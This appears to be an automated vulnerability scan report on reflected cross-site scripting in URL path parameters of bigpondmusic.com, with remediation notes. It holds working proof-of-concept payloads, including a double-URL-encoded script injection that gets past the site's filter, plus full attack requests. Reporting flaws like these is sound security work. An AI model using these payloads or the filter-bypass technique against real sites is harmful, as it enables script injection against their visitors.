HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87983
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772 was submitted in the REST URL parameter 2. This input was echoed as 664ab"><script>alert(1)</script>a352504a772 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88221
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c89'%3bfd2f58241 was submitted in the REST URL parameter 2. This input was echoed as e6c89';fd2f58241 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87860
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6ce5'%3b3ca787e9e3c was submitted in the REST URL parameter 3. This input was echoed as b6ce5';3ca787e9e3c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87806
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf was submitted in the REST URL parameter 3. This input was echoed as eed67"><script>alert(1)</script>ee34394dbaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87986
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3 was submitted in the REST URL parameter 1. This input was echoed as e9ce7"><script>alert(1)</script>5240436d2f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88606
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5936'%3b1c8e57db835 was submitted in the REST URL parameter 1. This input was echoed as a5936';1c8e57db835 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88073
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89 was submitted in the REST URL parameter 2. This input was echoed as 1fa67"><script>alert(1)</script>84ddb0ecf89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:32 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87938
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db736'%3bb0de1f819 was submitted in the REST URL parameter 2. This input was echoed as db736';b0de1f819 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:35 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88067
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116 was submitted in the REST URL parameter 3. This input was echoed as 7016f"><script>alert(1)</script>331eb61f116 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88087
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bed2'%3b027f4026e56 was submitted in the REST URL parameter 3. This input was echoed as 3bed2';027f4026e56 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87865
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d88d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3fcf6d9b5f was submitted in the REST URL parameter 4. This input was echoed as 3d88d"><script>alert(1)</script>f3fcf6d9b5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:08:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88242
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e372b863b109 was submitted in the REST URL parameter 1. This input was echoed as a3cc6"><script>alert(1)</script>372b863b109 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bphfa3cc6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e372b863b109/res/js/s_code.js HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88297
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91970'%3b855d056b211 was submitted in the REST URL parameter 1. This input was echoed as 91970';855d056b211 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bphf91970'%3b855d056b211/res/js/s_code.js HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87799
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1740019aa35 was submitted in the REST URL parameter 2. This input was echoed as b24ad"><script>alert(1)</script>1740019aa35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bphf/resb24ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1740019aa35/js/s_code.js HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88600
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40c2f'%3b258fff16697 was submitted in the REST URL parameter 2. This input was echoed as 40c2f';258fff16697 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bphf/res40c2f'%3b258fff16697/js/s_code.js HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88103
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0cdd28fe04 was submitted in the REST URL parameter 3. This input was echoed as f19e7"><script>alert(1)</script>e0cdd28fe04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bphf/res/jsf19e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0cdd28fe04/s_code.js HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:08:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:08:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87900
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c7d2'%3b2db515eb958 was submitted in the REST URL parameter 3. This input was echoed as 3c7d2';2db515eb958 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bphf/res/js3c7d2'%3b2db515eb958/s_code.js HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:08:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:08:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87937
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c46%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32850f3ca9f was submitted in the REST URL parameter 4. This input was echoed as f2c46"><script>alert(1)</script>32850f3ca9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bphf/res/js/s_code.jsf2c46%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32850f3ca9f HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:08:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87839
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
